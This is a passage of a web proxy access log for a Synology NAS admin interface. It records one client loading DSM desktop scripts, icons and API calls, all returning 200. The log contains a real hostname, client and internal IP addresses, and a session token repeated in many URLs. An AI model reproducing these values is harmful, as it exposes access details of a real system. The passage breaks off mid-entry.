192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/sprite-s46ce88ebfc.png" [Client 84.1.26.27] [Length 9029] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/SystemInfoApp/style.css?v=1661421011" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-options-dialog.js?v=4.15.9-0644&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskTray.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/MailTaskTray.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_pause.png?v=1c5da687c4ba047de83d53cf0c9b8faf" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_recent.png?v=0072a433b9598a0df7d69693eda96c65" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_volume.png?v=37ebf03645809486194d6444fbb1a719" [Client 84.1.26.27] [Length 1640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/SystemInfoApp/style.css?v=1661421011" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_bt_setting.png?v=64a2b619c83e2d218cfc213dfca3d082" [Client 84.1.26.27] [Length 1543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_launch.png?v=35914986444b1f36b0d98a60cf9d1b7f" [Client 84.1.26.27] [Length 539] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/overview_status_drive_index.png" [Client 84.1.26.27] [Length 5198] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/combo_trigger.png?v=8710c149eda822e2cea65d04294fe3b4" [Client 84.1.26.27] [Length 446] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/icn_thumbnail_converter.png" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/app_tray.js?v=3.2.1-23280&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadMonitor.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6258] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/menu_arrow_r.png?v=8fbae554c9026f62d469474ba885fab0" [Client 84.1.26.27] [Length 420] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_folder.png" [Client 84.1.26.27] [Length 216] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_pause.png" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_launch.png" [Client 84.1.26.27] [Length 586] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_recent.png" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 353] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/wdgt_icn_tray_cloud_sync_done.png?v=45d0095da5a965199220e140d577ef68" [Client 84.1.26.27] [Length 2699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cate_status.png?v=bb521cb3ed4dfaadf7f091d461a6ea00" [Client 84.1.26.27] [Length 2471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/admin_center.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 423009] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Foto.UserInfo" [Client 84.1.26.27] [Length 276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/C2FS.js?v=1.3.2-1037&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 164398] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 28340] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 194] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 106] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4323] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:34 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgMyDS.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3437] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgManApp.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 48026] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_72.png?v=42962-s9" [Client 84.1.26.27] [Length 3074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/assets/e8cd756c231384653a617238d1e779ae.png" [Client 84.1.26.27] [Length 1839] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/desktop/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/images/1x/help_72.png?v=42962-s9" [Client 84.1.26.27] [Length 7655] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_72.png?v=42962-s9" [Client 84.1.26.27] [Length 4822] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SupportForm/images/1x/SupportCenter_72.png?v=42962-s9" [Client 84.1.26.27] [Length 6085] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MediaServer/images/MediaServer_{0}.png&app_version=2.2.1-3406" [Client 84.1.26.27] [Length 5777] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/VideoStation/images/app/VideoStation_{0}.png&app_version=3.0.7-2512" [Client 84.1.26.27] [Length 4383] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/ResourceMonitor_72.png?v=42962-s9" [Client 84.1.26.27] [Length 5840] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/images/storage_manager_72.png?v=42962-s9" [Client 84.1.26.27] [Length 6279] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebDAVServer/images/icon/WebDav_{0}.png&app_version=2.4.8-10135" [Client 84.1.26.27] [Length 8831] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/images/security_scan_72.png?v=42962-s9&app_version=1.0" [Client 84.1.26.27] [Length 10211] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LogCenter/images/log_center_72.png?v=42962-s9&app_version=1.0" [Client 84.1.26.27] [Length 2886] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/AntiVirus/images/anti_virus_{0}.png&app_version=1.5.4-3099" [Client 84.1.26.27] [Length 6309] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive-ShareSync/images/package-{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 8439] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebStation/images/WebStation_{0}.png&app_version=3.1.0-0339" [Client 84.1.26.27] [Length 7495] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 6277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/CloudSync/images/CloudSync_{0}.png&app_version=2.7.2-2464" [Client 84.1.26.27] [Length 8807] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyPhotos/images/icon/photos_{0}.png&app_version=1.3.4-0340" [Client 84.1.26.27] [Length 6894] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AntiVirus/antivirus.js?v=1.5.4-3099&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 28902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SupportForm/SupportForm.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5879] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/HyperBackup/images/HyperBackup_{0}.png&app_version=3.0.2-2531" [Client 84.1.26.27] [Length 8651] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/AudioStation/images/AudioStation_{0}.png&app_version=7.0.3-5401" [Client 84.1.26.27] [Length 5019] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive-Drive/images/_Favicon/SynologyDrive_{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 6534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/VPNCenter/images/VPNServer_{0}.png&app_version=1.4.7-2901" [Client 84.1.26.27] [Length 6585] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive/images/DriveAdminConsole_{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 6321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 